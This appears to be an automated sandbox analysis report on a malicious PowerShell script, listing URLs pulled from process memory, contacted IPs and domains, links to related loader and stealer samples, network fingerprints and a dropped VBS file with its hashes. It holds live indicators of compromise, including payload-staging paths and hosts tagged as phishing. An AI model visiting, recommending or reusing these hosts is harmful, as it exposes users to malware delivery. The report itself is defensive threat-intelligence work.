                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.compowershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A561B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A573B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56ACF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.fornid.compowershell.exe, 00000000.00000002.2295236688.00000256E3748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E3284000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendepowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendes78.spowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jspowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.almrwad.com/wh/Subordinerendes78.smpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fornid.com/powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://almrwad.compowershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A578DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A561B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56B64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.fornid.com/144-filtri-per-mascherepowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E376F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.almrwad.com/wh/Subordinerendes78powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.erp-royal-crown.info/wh/Subordpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: phishing
                                            		unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E376F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://fornid.compowershell.exe, 00000000.00000002.2295236688.00000256E374D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wh/Subordinerepowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.info/whpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.fornid.com/sitemappowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoropowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/145-maschere-antigaspowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/Licensepowershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.almrwad.com/wh/Subordinerendpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Subordipowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Suborpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.fornid.com/il-mio-accountpowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Subopowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                http://www.almrwad.compowershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A578DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A561B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56B64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.almrwad.com/wh/Subordinerepowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.inpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://go.microspowershell.exe, 00000003.00000002.2154679290.000001C483FE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.almrwad.com/wh/Subordipowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.copowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.com/wh/Subordinerendes78.powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://erp-royal-crown.infopowershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56D8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56A85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://www.erp-royal-crown.info/wh/Subordinerendespowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.erp-royal-crown.info/wh/Subordinerendes78.spowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.fornid.com/img/logo.jpgpowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/whpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.erp-royal-crown.info/wh/Subordinpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subopowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://blog.fornid.com/powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2361683425.00000256F1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2361683425.00000256F1CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2174560183.000001C493751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.erp-royal-crown.info/wh/Subordinerendes78powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.fornid.com/content/13-international-shipmentspowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.com/wh/Suborpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2154679290.000001C4849F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jspowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.erp-royal-crown.info/wh/Subordinerendes7powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.fornid.compowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E374D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.fornid.com/cercapowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.erp-royal-crown.info/powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.microsoft.co;Qpowershell.exe, 00000000.00000002.2376659710.00000256F9E80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.almrwad.com/wh/Subordinerenpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.mpowershell.exe, 00000000.00000002.2377549383.00000256FA01A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          91.193.42.13
                                                          		www.pineappletech.aeBelgium
                                                          		48694ITFPLfalse
                                                          93.95.216.175
                                                          		fornid.comItaly
                                                          		52030SERVERPLAN-ASITtrue
                                                          148.251.114.233
                                                          		erp-royal-crown.infoGermany
                                                          		24940HETZNER-ASDEfalse
                                                          184.171.244.231
                                                          		almrwad.comUnited States
                                                          		33182DIMENOCUSfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1569004
                                                          Start date and time:2024-12-05 10:43:49 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 26s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:ky.ps1
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.winPS1@11/13@4/4
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 91%
                                                          • Number of executed functions: 17
                                                          • Number of non-executed functions: 3
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 2724 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 4904 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 616 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: ky.ps1

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          04:44:41API Interceptor1900630x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          91.193.42.13mj.ps1Get hashmaliciousUnknownBrowse
                                                            ap.ps1Get hashmaliciousUnknownBrowse
                                                              cu.ps1Get hashmaliciousUnknownBrowse
                                                                ni.ps1Get hashmaliciousUnknownBrowse
                                                                  qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                    List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      93.95.216.175mj.ps1Get hashmaliciousUnknownBrowse
                                                                        ap.ps1Get hashmaliciousUnknownBrowse
                                                                          cu.ps1Get hashmaliciousUnknownBrowse
                                                                            ni.ps1Get hashmaliciousUnknownBrowse
                                                                              148.251.114.233PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                              • www.eslameldaramlly.site/30vc/
                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                              • www.eslameldaramlly.site/30vc/
                                                                              PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.eslameldaramlly.site/fchs/
                                                                              PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                              • www.eslameldaramlly.site/30vc/
                                                                              PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                              • www.eslameldaramlly.site/30vc/
                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                              • www.eslameldaramlly.site/30vc/
                                                                              184.171.244.231script.vbsGet hashmaliciousUnknownBrowse
                                                                                mg.vbsGet hashmaliciousUnknownBrowse
                                                                                  mj.ps1Get hashmaliciousUnknownBrowse
                                                                                    ap.ps1Get hashmaliciousUnknownBrowse
                                                                                      cu.ps1Get hashmaliciousUnknownBrowse
                                                                                        Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                          ni.ps1Get hashmaliciousUnknownBrowse
                                                                                            qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  DIMENOCUSscript.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 184.171.244.231
                                                                                                  mg.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 184.171.244.231
                                                                                                  mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 184.171.244.231
                                                                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 184.171.244.231
                                                                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 184.171.244.231
                                                                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 184.171.244.231
                                                                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 184.171.244.231
                                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                  • 67.23.237.28
                                                                                                  file.exeGet hashmaliciousAmadeyBrowse
                                                                                                  • 67.23.237.28
                                                                                                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                  • 8.33.162.220
                                                                                                  ITFPLmj.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                  • 91.193.42.13
                                                                                                  List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                  • 91.193.42.13
                                                                                                  KgQJ0dIs3A.exeGet hashmaliciousAmadey, zgRATBrowse
                                                                                                  • 91.193.43.180
                                                                                                  7GC8osUQMq.exeGet hashmaliciousAmadeyBrowse
                                                                                                  • 91.193.43.180
                                                                                                  Y3KkfxEZuo.exeGet hashmaliciouszgRATBrowse
                                                                                                  • 91.193.43.180
                                                                                                  wqb7dL448k.exeGet hashmaliciousAmadey, Xmrig, zgRATBrowse
                                                                                                  • 91.193.43.180
                                                                                                  HETZNER-ASDEab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                  • 213.239.239.164
                                                                                                  script.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 148.251.114.233
                                                                                                  mg.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 148.251.114.233
                                                                                                  mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 148.251.114.233
                                                                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 148.251.114.233
                                                                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 148.251.114.233
                                                                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 148.251.114.233
                                                                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 148.251.114.233
                                                                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 88.99.61.52
                                                                                                  https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                  • 5.9.227.67
                                                                                                  SERVERPLAN-ASITmj.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 93.95.216.175
                                                                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 93.95.216.175
                                                                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 93.95.216.175
                                                                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 93.95.216.175
                                                                                                  untrippingvT.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 46.254.34.201
                                                                                                  yT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 46.254.34.201
                                                                                                  mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 46.254.34.201
                                                                                                  6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 46.254.34.201
                                                                                                  G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 46.254.34.201
                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 193.70.147.14

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  script.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  mg.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231
                                                                                                  RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  • 91.193.42.13
                                                                                                  • 93.95.216.175
                                                                                                  • 148.251.114.233
                                                                                                  • 184.171.244.231

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\Public\f3j.vbs

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with very long lines (316), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):29287
                                                                                                  Entropy (8bit):5.16757071229696
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                                                                  MD5:8DF76AF54C38D5D4C2CD9F6D18EEDF92
                                                                                                  SHA1:B21C95EBF34440AD8DA30F6E4FE25BADB871D61A
                                                                                                  SHA-256:2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
                                                                                                  SHA-512:8DBBDBC575A292890F1B1BB8AEDA916A958225B11739075B447AE7CE64774C678C45B071F0FBB91460BB218409E026ECFCF05740DAD8EB059B773C990D57FB09
                                                                                                  Malicious:true
                                                                                                  Reputation:low
